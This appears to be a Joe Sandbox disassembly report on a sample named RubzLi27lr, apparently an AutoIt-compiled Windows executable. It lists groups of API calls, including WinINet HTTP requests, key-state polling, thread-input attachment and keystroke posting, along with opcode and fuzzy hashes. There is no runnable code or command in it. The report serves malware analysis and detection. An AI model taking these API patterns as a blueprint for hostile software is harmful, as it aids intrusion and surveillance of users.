                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AE2CA0
                                                                                                                  • _free.LIBCMT ref: 00AE2CAB
                                                                                                                  • _free.LIBCMT ref: 00AE2CB6
                                                                                                                  • _free.LIBCMT ref: 00AE2CC1
                                                                                                                  • _free.LIBCMT ref: 00AE2CCC
                                                                                                                  • _free.LIBCMT ref: 00AE2CD7
                                                                                                                  • _free.LIBCMT ref: 00AE2CE2
                                                                                                                  • _free.LIBCMT ref: 00AE2CED
                                                                                                                  • _free.LIBCMT ref: 00AE2CFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: c911e1df2577868b928d8fde9274ca3e00832e6687cb4d949d6fd26371231007
                                                                                                                  • Instruction ID: e4fdf30b1053dc86afaa364b1e3f85260641b54348fa03c6414a5c3a72733e21
                                                                                                                  • Opcode Fuzzy Hash: c911e1df2577868b928d8fde9274ca3e00832e6687cb4d949d6fd26371231007
                                                                                                                  • Instruction Fuzzy Hash: 2111E67610014CBFCB02EF56DA82EDD3BA9FF45350F4254A0FA489F222DA35EE509B90
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AB1459
                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00AB14F8
                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00AB16DD
                                                                                                                  • DestroyWindow.USER32(?), ref: 00AF24B9
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00AF251E
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF254B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                  • String ID: close all
                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                  • Opcode ID: 6af9f2638f1fcfd771f5b79775be41334ab20b2e2647b7ba5c8bd93d1c10c60f
                                                                                                                  • Instruction ID: d41d8276149ec9b90bef41e1cc98b0b6409555d86ee7166ab84ee2e3f318faf3
                                                                                                                  • Opcode Fuzzy Hash: 6af9f2638f1fcfd771f5b79775be41334ab20b2e2647b7ba5c8bd93d1c10c60f
                                                                                                                  • Instruction Fuzzy Hash: 45D18D31702222CFCB29EF54C5A9B69F7A8BF05700F5542ADE54AAB252CB30AD12CF50
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B27FAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B27FC1
• GetFileAttributesW.KERNEL32(?), ref: 00B27FEB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00B28005
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B28017
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B28060
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B280B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: 0a8410bd2feb0fe11f4316a5e61f1aa2a17fd3d55f6bd1f4dec9425bb9cb30c6
• Instruction ID: d2565f3a53e4564898f925998980d195dfce22d43828fe4a2521ccf602d7582d
• Opcode Fuzzy Hash: 0a8410bd2feb0fe11f4316a5e61f1aa2a17fd3d55f6bd1f4dec9425bb9cb30c6
• Instruction Fuzzy Hash: BD81CF725482519BCB20EF14D8849AFB3ECFF89310F15489EF889D7251EB34DD498BA6
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00AB5C7A
  • Part of subcall function 00AB5D0A: GetClientRect.USER32(?,?), ref: 00AB5D30
  • Part of subcall function 00AB5D0A: GetWindowRect.USER32(?,?), ref: 00AB5D71
  • Part of subcall function 00AB5D0A: ScreenToClient.USER32(?,?), ref: 00AB5D99
• GetDC.USER32 ref: 00AF46F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AF4708
• SelectObject.GDI32(00000000,00000000), ref: 00AF4716
• SelectObject.GDI32(00000000,00000000), ref: 00AF472B
• ReleaseDC.USER32(?,00000000), ref: 00AF4733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AF47C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 146089fbff78fb6f18575021f534dac37194ebcc8f01609f4b0a31646ec73de3
• Instruction ID: 2be4e7e51e5ec56b1e11bc86d9d7365a224cf0882046c9759ead09759df1725d
• Opcode Fuzzy Hash: 146089fbff78fb6f18575021f534dac37194ebcc8f01609f4b0a31646ec73de3
• Instruction Fuzzy Hash: 1571DF34800209DFCF219FA4C984AFB7BBAFF4A360F144269FE559A266C7318941DF50
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B235E4
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
• LoadStringW.USER32(00B82390,?,00000FFF,?), ref: 00B2360A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
• Opcode ID: 8204062d12c632675442db070b129a1406451e21d7709589a7b4bf3f75fe9f17
• Instruction ID: 3f3fe0c67eee2ff956777dc1a3b27c2321b66400aff8fb635f12f86ed0253137
• Opcode Fuzzy Hash: 8204062d12c632675442db070b129a1406451e21d7709589a7b4bf3f75fe9f17
• Instruction Fuzzy Hash: EC517F72800219BBCF15EBA0DD82EEEBBB8EF04700F544165F119721A2DB355B99DFA1
APIs
  • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
  • Part of subcall function 00AC912D: GetCursorPos.USER32(?), ref: 00AC9141
  • Part of subcall function 00AC912D: ScreenToClient.USER32(00000000,?), ref: 00AC915E
  • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000001), ref: 00AC9183
  • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000002), ref: 00AC919D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00B48B6B
• ImageList_EndDrag.COMCTL32 ref: 00B48B71
• ReleaseCapture.USER32 ref: 00B48B77
• SetWindowTextW.USER32(?,00000000), ref: 00B48C12
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B48C25
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00B48CFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: 3ddc7ff98de83faba5622304b402e26af6b1b7d60d6f63dddf228cdf9429f2e2
• Instruction ID: 4ca7114188a21ff34482b0fad45ea9fda37875073c546d94063106d6ae7e6085
• Opcode Fuzzy Hash: 3ddc7ff98de83faba5622304b402e26af6b1b7d60d6f63dddf228cdf9429f2e2
• Instruction Fuzzy Hash: B7518A71105304AFD700EF24CD96FAE7BE8FB88710F000A6DF996572A2CB719A15DB62
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B2C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B2C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B2C2CA
• GetLastError.KERNEL32 ref: 00B2C322
• SetEvent.KERNEL32(?), ref: 00B2C336
• InternetCloseHandle.WININET(00000000), ref: 00B2C341
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: fd51b5ae4faff87f74b6c125439aae06bf11e79836bf0dbadc9b637d5cfecc84
• Instruction ID: a9f70120743e8771c1ccbc49bf1e926f011c78954205a99014a48b447440067b
• Opcode Fuzzy Hash: fd51b5ae4faff87f74b6c125439aae06bf11e79836bf0dbadc9b637d5cfecc84
• Instruction Fuzzy Hash: 96319CB1600618AFD721DFA4AC88AAF7FFCFB4A744B10895EF44A93200DB70DD448B65
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AF3AAF,?,?,Bad directive syntax error,00B4CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B198BC
• LoadStringW.USER32(00000000,?,00AF3AAF,?), ref: 00B198C3
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B19987
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 55c2c1071c57fa736cda96fe7978f2e518f669ec6cbfb44fd0425733967d2792
• Instruction ID: 474583ef2ddbd4435ffe0518752a961928322ddda3d37bc4608b69e787d07941
• Opcode Fuzzy Hash: 55c2c1071c57fa736cda96fe7978f2e518f669ec6cbfb44fd0425733967d2792
• Instruction Fuzzy Hash: 0E21913280021EBFCF15AF90CD56EEE7BB9FF18700F444499F519660A2EB319A58DB51
APIs
• GetParent.USER32 ref: 00B120AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 00B120C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B1214D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
                                                                                                                  • Opcode ID: b07f71fffe881ea975bb233b546b57b99d9e28b10bab6226f6fee28121810541
                                                                                                                  • Instruction ID: 0872b911bdb18501f9b4109acf7f2bac7bb3ee50e36288e71734a552b965f329
                                                                                                                  • Opcode Fuzzy Hash: b07f71fffe881ea975bb233b546b57b99d9e28b10bab6226f6fee28121810541
                                                                                                                  • Instruction Fuzzy Hash: 2D117A3A684302BAFA10A720DC06CFA37DCDB0A720B204096FB09B51F1FEB158B11514
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1282221369-0
                                                                                                                  • Opcode ID: bb2ab027f1384b6b9b14774d422b261b8d8aa4704ca2dba11f68c3e756cfbd23
                                                                                                                  • Instruction ID: c9610b7a687d19cfc60fe5cd26e743aa8075e12d452078fd25f1331624f08769
                                                                                                                  • Opcode Fuzzy Hash: bb2ab027f1384b6b9b14774d422b261b8d8aa4704ca2dba11f68c3e756cfbd23
                                                                                                                  • Instruction Fuzzy Hash: 756167729043C4AFDB25AFBA9D81B6E7BA9EF05370F04416DF94197282EA319D02C790
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B45186
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00B451C7
                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B451CD
                                                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B451D1
                                                                                                                    • Part of subcall function 00B46FBA: DeleteObject.GDI32(00000000), ref: 00B46FE6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B4520D
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B4521A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B4524D
                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B45287
                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B45296
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3210457359-0
                                                                                                                  • Opcode ID: 9433b96adb78505fcfc614f8130fb08d2d75e8e3eef4e519176701adb7d7392b
                                                                                                                  • Instruction ID: 5c28e8d4e4e487754d9e818dcc96c2c07dc6dd4a4a036101b2e30c34c930bfc6
                                                                                                                  • Opcode Fuzzy Hash: 9433b96adb78505fcfc614f8130fb08d2d75e8e3eef4e519176701adb7d7392b
                                                                                                                  • Instruction Fuzzy Hash: 48518230A41E08BFEF309F24CC49B993BE5FB05721F148096F515A62E2C7B59B80EB41
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B06890
                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B068A9
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B068B9
                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B068D1
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B068F2
                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AC8874,00000000,00000000,00000000,000000FF,00000000), ref: 00B06901
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0691E
                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AC8874,00000000,00000000,00000000,000000FF,00000000), ref: 00B0692D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268354404-0
                                                                                                                  • Opcode ID: e686f0918628fabfb26aa12f4f556764514590f61d8eee1a28998ddfeb5bca11
                                                                                                                  • Instruction ID: 1dcbdfced1941436a7baf462dd7affea26edc960626f2102ef9c0d9e1266204e
                                                                                                                  • Opcode Fuzzy Hash: e686f0918628fabfb26aa12f4f556764514590f61d8eee1a28998ddfeb5bca11
                                                                                                                  • Instruction Fuzzy Hash: E0518670600209EFDB208F28CC55FAA7BB5FB48750F118558F906972E0DB74EE91DB50
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B2C182
                                                                                                                  • GetLastError.KERNEL32 ref: 00B2C195
                                                                                                                  • SetEvent.KERNEL32(?), ref: 00B2C1A9
                                                                                                                    • Part of subcall function 00B2C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B2C272
                                                                                                                    • Part of subcall function 00B2C253: GetLastError.KERNEL32 ref: 00B2C322
                                                                                                                    • Part of subcall function 00B2C253: SetEvent.KERNEL32(?), ref: 00B2C336
                                                                                                                    • Part of subcall function 00B2C253: InternetCloseHandle.WININET(00000000), ref: 00B2C341
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 337547030-0
                                                                                                                  • Opcode ID: 4378090369a32f877f87d1bd5f9d31c55876c77b365b7668d4455412e76c0f34
                                                                                                                  • Instruction ID: 6b40047511a02543aa016ea9b9e40a007517dfb6c9eb22438082c391dd0158c2
                                                                                                                  • Opcode Fuzzy Hash: 4378090369a32f877f87d1bd5f9d31c55876c77b365b7668d4455412e76c0f34
                                                                                                                  • Instruction Fuzzy Hash: 22318B75201B11EFDB219FA5ED44A6ABFF8FF19700B00446DF95A93620DB31E914EBA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B13A57
                                                                                                                    • Part of subcall function 00B13A3D: GetCurrentThreadId.KERNEL32 ref: 00B13A5E
                                                                                                                    • Part of subcall function 00B13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B125B3), ref: 00B13A65
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B125BD
                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B125DB
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B125DF
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B125E9
                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B12601
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B12605
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B1260F
                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B12623
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B12627
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2014098862-0
                                                                                                                  • Opcode ID: dd8327e750d8a2fa4e9e1c3f2b9b556690d7bc1ee122b0064b57fa918ec23c77
                                                                                                                  • Instruction ID: 33b6f074563d65ab7f6379227914aadfc09816fe0af3a214a4cae6e5e806fcec
                                                                                                                  • Opcode Fuzzy Hash: dd8327e750d8a2fa4e9e1c3f2b9b556690d7bc1ee122b0064b57fa918ec23c77
                                                                                                                  • Instruction Fuzzy Hash: B901D430391210BBFB1067689C8AF993F99EF4EF12F600001F358AF0D1CDF225848AA9
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B11449,?,?,00000000), ref: 00B1180C
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00B11449,?,?,00000000), ref: 00B11813
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B11449,?,?,00000000), ref: 00B11828
